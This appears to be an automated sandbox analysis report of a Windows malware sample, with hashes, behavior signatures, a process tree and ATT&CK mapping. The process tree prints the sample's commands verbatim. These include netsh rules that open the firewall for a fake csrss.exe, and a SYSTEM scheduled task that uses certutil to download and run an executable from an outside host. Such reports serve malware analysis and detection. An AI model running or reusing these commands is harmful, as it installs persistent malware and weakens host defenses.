Analysis

  • max time kernel
    26s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 00:39

General

  • Target

    988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe

  • Size

    3.8MB

  • MD5

    795847175d72c68819a2f8e0dfed1e98

  • SHA1

    00c46c3540cbaa0b5a3e072ad0cd6a35fad49102

  • SHA256

    988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059

  • SHA512

    316eb4693aa242f94ee9071d6a82db81ec851dd40cee6879c2ea924fed7c3ae9ab02e7cab5a7c51231a54c3ffc4df3536a5ff5b99902f8a8af440232357c9d5a

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
    "C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:904
    • C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
      "C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:608
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:3148
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
          3⤵
            PID:888
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
              PID:1060
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                4⤵
                • Creates scheduled task(s)
                PID:3500
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                4⤵
                • Creates scheduled task(s)
                PID:3732
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\Sysnative\bcdedit.exe /v
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:3324
              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                4⤵
                  PID:4228
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4424
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
            1⤵
              PID:4752

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Execution

            Scheduled Task

            1
            T1053

            Persistence

            Modify Existing Service

            1
            T1031

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              Filesize

              1.7MB

              MD5

              13aaafe14eb60d6a718230e82c671d57

              SHA1

              e039dd924d12f264521b8e689426fb7ca95a0a7b

              SHA256

              f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

              SHA512

              ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

            • C:\Windows\rss\csrss.exe
              Filesize

              3.1MB

              MD5

              130c417ec020536fc51190dadacc28b5

              SHA1

              1e27c5b3da9f817482b5c00a80a7e498fd497a28

              SHA256

              4d00c1804570d1ecbfc07b5084ec1cd734fd03b346f81017ba24badbdfbb11e7

              SHA512

              de4df19a7e7688f72688fa5a6c64877a4f55fd06567702463822539479556b4bc4ec7f9440ad05ef7c9ec2e396a996d32695ce10fee32063eae3193ccc5b51f0

            • C:\Windows\rss\csrss.exe
              Filesize

              2.7MB

              MD5

              ca698116e73b34ce6fee614b1d2f9f34

              SHA1

              5d71357d19c963bb0e7cddbd179b3c6e0edfdf54

              SHA256

              a39b83f1053e3c8f27359f567906c3cf1dec702a4f0354a9ab4eb4cf25b49558

              SHA512

              5351b0c3560655415ba6a7f37308fd6320b0950b9e053cfa89f489a0e1248e4a808a62383b743c387537a561a0aebe2440e7a35dfb042f2b6fe2f7b39ad8fd07

            • memory/608-137-0x0000000000000000-mapping.dmp
            • memory/888-139-0x0000000000000000-mapping.dmp
            • memory/904-130-0x0000000002AF3000-0x0000000002E99000-memory.dmp
              Filesize

              3.6MB

            • memory/904-132-0x0000000000400000-0x0000000000B10000-memory.dmp
              Filesize

              7.1MB

            • memory/904-131-0x0000000002EA0000-0x0000000003596000-memory.dmp
              Filesize

              7.0MB

            • memory/1060-147-0x0000000000400000-0x0000000000B10000-memory.dmp
              Filesize

              7.1MB

            • memory/1060-146-0x0000000002E00000-0x00000000031A6000-memory.dmp
              Filesize

              3.6MB

            • memory/1060-141-0x0000000000000000-mapping.dmp
            • memory/3148-138-0x0000000000000000-mapping.dmp
            • memory/3324-150-0x0000000000000000-mapping.dmp
            • memory/3500-145-0x0000000000000000-mapping.dmp
            • memory/3732-144-0x0000000000000000-mapping.dmp
            • memory/4228-148-0x0000000000000000-mapping.dmp
            • memory/4500-135-0x0000000002C60000-0x0000000003356000-memory.dmp
              Filesize

              7.0MB

            • memory/4500-136-0x0000000000400000-0x0000000000B10000-memory.dmp
              Filesize

              7.1MB

            • memory/4500-134-0x00000000028B0000-0x0000000002C56000-memory.dmp
              Filesize

              3.6MB

            • memory/4500-133-0x0000000000000000-mapping.dmp
            • memory/4752-140-0x0000000000000000-mapping.dmp